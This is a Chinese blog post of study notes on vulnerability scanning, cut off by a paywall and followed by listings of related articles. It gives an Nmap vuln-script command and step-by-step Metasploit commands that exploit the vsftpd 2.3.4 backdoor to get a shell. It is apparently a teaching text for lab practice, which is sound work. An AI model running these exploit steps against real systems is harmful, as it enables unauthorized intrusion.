漏洞扫描学习笔记(一)

最新推荐文章于 2024-10-07 20:05:08 发布
最新推荐文章于 2024-10-07 20:05:08 发布
阅读量982 收藏 4
点赞数
分类专栏: 信息安全 文章标签: linux windows xp 操作系统 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/brainw/article/details/105701943
版权
本文介绍了漏洞扫描的基本原理,通过发送验证数据到目标服务,根据响应判断是否存在漏洞。提到了Nmap和Nessus等扫描工具,以及Metasploit用于漏洞利用。在Web应用程序漏洞扫描部分,列举了Owasp-ZAP、AWVS等常见扫描器,并以Sqlmap为例展示了如何利用SQL注入漏洞。
摘要由CSDN通过智能技术生成

漏洞扫描原理

漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但是也存在错误扫描,需要对扫描结果进行漏洞验证。

其实扫描器的原理大致相同都是通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在漏洞的响应一致时,就表明存在漏洞。

漏洞扫描工具

Nmap

nmap --script vuln 目标IP地址

Nessus 系统漏洞扫描

**Metasploit **对扫描到的漏洞加以利用

以vsftpd2.3.4为例

search vsftpd

得到

use (复制粘贴上面的路径)

show payloads

set payload cmd/unix/interact //上面展示的路径

show options 设置所用的参数

set rhost(上面name下面的) ip

show options 观察是否设置成功

exploit 溢出

得到shell

web应用程序漏洞扫描

针对web应用程序的漏洞扫描其实就是每个扫描器读取自己的payload进行探测

常见Web漏洞扫描器:

1.Owasp-zap

2.awvs

3.appscan

4.nikto

5.Burpsuite

每个扫描器都有各自不同的payload探测</

最低0.47元/天 解锁文章
brainw
关注
专栏目录
Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记
Sumarua的博客
07-26 1万+
文章目录Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记)一、Nmap端口扫描二、Nmap脚本加载扫描 Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记) Nmap具体功能:端口扫描,协议扫描,漏洞扫描,绕过防护,漏洞利用等。 一、Nmap端口扫描 端口状态: 1、Open:端口开启,有程序监听此端口 2、Closed:端口关闭,数据能到达主机,但是没有程序监听此端口 3、Filtered:数据未能到达主机 4、Unfiltered:数据能到达主机,但是Nmap无法判断端口开启还是关闭 5、Open | f
漏洞扫描基础
m0_57193576的博客
04-22 951
什么是CTF CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。 CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 发展至今,已经成为全球范围网络安全圈流行的竞赛形式。 竞赛 我们把CTF简称为夺旗赛,是因为出题的人把答案都放一个叫flag的文件下或者用flag{}形式展示给我们。一般是我们在某个站点或者某个文件下去寻找或分析得到的 比赛形式 1.解题模式 通过解决主办方
kali永恒之蓝漏洞扫描学习笔记
qq_43236906的博客
10-15 2946
永恒之蓝漏洞扫描学习 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 准备工作 准备工作:win server2008(未安装补丁)和kali linux,一台攻击,一台被攻击的或称为靶机(靶机确保被攻击的虚拟机开启445端口) 查看靶机的ip ipconfig ##在靶机上查看,本机ip为192.168.152.135 nmap
漏洞扫描的简单总结概述理解
04-10
自己的一些总结 nginx mysql 还有漏洞扫描的解析,整理
带你体验一款主流且开源的Web漏洞扫描工具(OWASP ZAP)
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
10-07 2661
由Checkmarx公司贡献给OWASP的Zed Attack Proxy(ZAP)是一个免费的开源渗透测试工具。ZAP是专门为测试web应用程序而设计的,既灵活又可扩展。ZAP的核心是“中间代理操纵器”。它位于测试人员的浏览器和web应用程序之间,与Burp工作原理一样,因此它可以拦截和检查浏览器和web程序之间发送的消息(包含https),根据需要修改内容,然后将这些数据包转发到目的地。它可以用作独立的应用程序,也可以用作守护进程。
kali linux渗透测试之漏洞扫描
热门推荐
qq_57223070的博客
09-26 1万+
skipfish、nessus、AWVS、nikto的简单使用及功能倾向介绍。
漏洞扫描基础知识
S_0611的博客
04-26 2215
文章目录 一、CTF 基础知识 —CTF简介 竞赛模式 比赛形式 题目类型 二、web 信息泄露 目录遍历 PHPINFO 备份文件下载 网站源码 bak文件 vim缓存 DS_Store 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录文章目录一、CTF基础知识1、CTF简介2、竞赛模式3、比赛形式4、题目类型二、Web(信息泄露)目录遍历PHPINFO2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 找到flag复制 提交 2、竞赛模式 开启题目 找到fla
Kali Linux渗透测试——漏洞扫描
Captain_RB的博客
02-09 1万+
由于漏洞扫描中基于服务扫描结果速度太慢,搜索已公开漏洞数据库数量过于庞大,所以一般使用漏洞扫描器实现。扫描器的功能包括发现IP,识别OS、服务、配置、漏洞,并能够格式化信息,对搜索结果进行筛选、分组,生成报告信息。利用nmap扫描脚本可以对一些特定的漏洞进行扫描,但是其提供的信息及功能有限,下面介绍两种功能强大的漏洞扫描器。...
漏洞扫描学习笔记
weixin_52034407的博客
03-21 331
漏洞扫描学习笔记
Vulnerability_Scanner:利用机器学习技术的C ++漏洞扫描程序
04-08
漏洞扫描器 概述 软件漏洞是当前软件开发中的关键问题之一。 这些漏洞可能构成严重的利用风险,并导致系统受损,信息泄漏甚至进一步的财务损失。 不幸的是,测试和手动代码审查不能总是找到每个漏洞。 为了解决该...
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
《Web漏洞防护》读书笔记——第9章,XSS防护
jexsen的博客
04-09 323
《Web漏洞防护》读书笔记——第7章,XSS防护 XSS 跨站脚本攻击,注入型攻击,攻击者使用Web应用将恶意代码发送给不同终端用户,造成恶意代码在用户端的执行。由于用户的浏览器无法判断脚本是否应该被新人,人为脚本来自可信的源,直接执行脚本。 核心:Web应用直接将用户的输入作为输出,且对输出未进行任何的编码和验证。 极易出现XSS的地方 1.搜索域:直接将用户的搜索内容不加处理的返回给用户。 2.输入域:直接将用户输入的内容不加处理的返回给用户。 3.错误信息:直接将用户提供的内容不加处理的防止在错误消
第八章(一)—漏洞扫描(基本概念)
weixin_43876557的博客
06-01 2256
基于端口服务扫描结果版本信息(速度慢) 搜索已公开的漏洞数据库(数量大) 使用弱点扫描器实现漏洞管理
KALI之漏洞扫描
hacker681的博客
01-14 6687
漏洞扫描 发现漏洞 端口开放的跑的是什么服务这些端口上的服务使用的软件的版本等等的信息有了这些信息的时候可以到官方网站去比较一下最新的版本是什么版本两个比对一下你会发现有补丁列表官方修复了什么漏洞如果高危漏洞的话就可以直接控制目标系统。所以通过之前掌握的信息呢可以以此为基础对目标系统存了什么漏洞弱点来判断,这样做有很大的弊端就是扫了很多端口每个端口跑了很多服务 要忙于在大网站上面去查询官方的文档阅...
漏洞扫描有哪些特征?
Adelineyoung8的博客
04-10 406
自动化扫描可以快速、高效地检测出系统中的漏洞,并且可以针对不同的系统和应用进行定制化的扫描,提高检测的准确性和。漏洞扫描需要由专业的安全人员操作,这些人员通常具备丰富的安全知识和技能,能够熟练地使用各种漏洞扫描工具和攻击手段,对目标系统进行深入的检测和分析。这使得漏洞扫描成为一种安全、可靠的检测手段。漏洞扫描的核心是模拟攻击行为,通过模拟黑客攻击的手段和行为,对目标系统进行深入的漏洞扫描和攻击模拟。漏洞扫描通常会检测已知的漏洞和攻击手段,这些已知的漏洞和攻击手段被记录在各种漏洞数据库和黑客工具中。
【Kali Linux】渗透测试——漏洞扫描
程序员若风的博客
11-07 2017
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包视频教程。
六、漏洞扫描
谢小二的博客
06-04 472
漏洞扫描
漏洞扫描器 - cmd命令行执行
ASDF的博客
06-05 1084
漏洞扫描器 - cmd命令行执行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值